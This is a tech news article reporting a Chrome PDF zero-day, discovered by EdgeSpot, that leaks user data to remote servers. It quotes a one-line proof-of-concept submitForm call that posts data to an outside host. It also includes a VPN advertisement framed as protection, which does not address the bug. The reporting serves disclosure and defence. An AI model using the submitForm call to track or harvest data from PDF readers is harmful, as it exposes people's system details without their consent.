Chrome vulnerability lets hackers collect user data via PDF files

Rabia Noureen avatar. By: Rabia Noureen
3 minute read
google chrome

Home » News » Chrome vulnerability lets hackers collect user data via PDF files

Exploit detection service EdgeSpot discovered an intriguing Chrome zero-day vulnerability exploiting PDF documents. The vulnerability allows attackers to harvest sensitive data using malicious PDF documents opened in Chrome. 

As soon as the victim opens the respective PDF files in Google Chrome, a malicious program starts working in the background by collecting user data.

The data is then forwarded to the remote server that is being controlled by the hackers. You might be wondering what data is being sucked by the attackers, they target the following data on your PC:

  • IP address
  • Full path of the PDF file on the system
  • OS and Chrome versions

Beware of malware-ridden PDF files

You might be surprised to know that nothing happens when Adobe Reader is used for opening PDF files. Additionally, HTTP POST requests are used to transfer data to the remote servers without any user intervention.

Experts spotted that one of the two domains readnotify[.]com or burpcollaborator[.]net was receiving the data.

You can imagine the intensity of the attack by considering the fact that most of the antivirus software is not able to detect the samples detected by EdgeSpot.

Experts reveal that the attackers are using the “this.submitForm()” PDF Javascript API to collect the sensitive information of the users.

We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal data to google.com.

The experts actually found out that this Chrome bug was being exploited by two distinct sets of malicious PDF files. Both of them were circulated in October 2017 and September 2018, respectively.

Notably, the collected data can be used by the attackers to fine-tune attacks in the future. Reports suggest that the first batch of files was compiled using ReadNotify’s PDF tracking service.

Users can utilize the service to keep track of user views.  EdgeSpot has not shared any details regarding the nature of the second set of PDF files.

How to Stay Protected


In case you want to be secure while surfing the internet, you will need to get a full-dedicated tool to secure your network.  Install now Cyberghost VPN and secure yourself. It protects your PC from attacks while browsing, masks your IP address and blocks all unwanted access.


The Exploit detection service EdgeSpot wanted to alert the users Chrome users about the potential risks because the patch is not expected to be released in the near future.

EdgeSpot reported to Google about the vulnerability last year and the company promised to release a patch late April. H

owever, you can consider using a temporary workaround to the problem by locally viewing the received PDF documents using an alternative PDF reader app.

Alternatively, you can also open your PDF documents in Chrome by disconnecting your systems from the Internet. Meanwhile, you can wait for the Chrome 74 update that is expected to be rolled out on April 23.

RELATED ARTICLES YOU NEED TO CHECK OUT:

Discussions

Next up

Here’s how to permanently fix Taskhost.exe high CPU usage

John Waibochi avatar. By: John Waibochi
5 minute read

Taskhost.exe is a process that hosts various Windows processes running from a dynamic link library instead of the conventional .exes (executable files). You see, libraries (.dlls) […]

Continue Reading

MsConfig in Windows 8, Windows 10: How to Access it

John Nedelcu By: John Nedelcu
3 minute read

Using the good ol’ msconfig in Windows 10, Windows 8 is very, very simple; read our basic advice to learn how easy it is to […]

Continue Reading

5 best DVD copy protection software to install in 2019

Costea Lestoc By: Costea Lestoc
6 minute read

DVD copy protection is a broad term that covers various methods of copy protection for DVDs. These methods include DRM, CD/DVD-checks, Dummy Files, over-sizing and […]

Continue Reading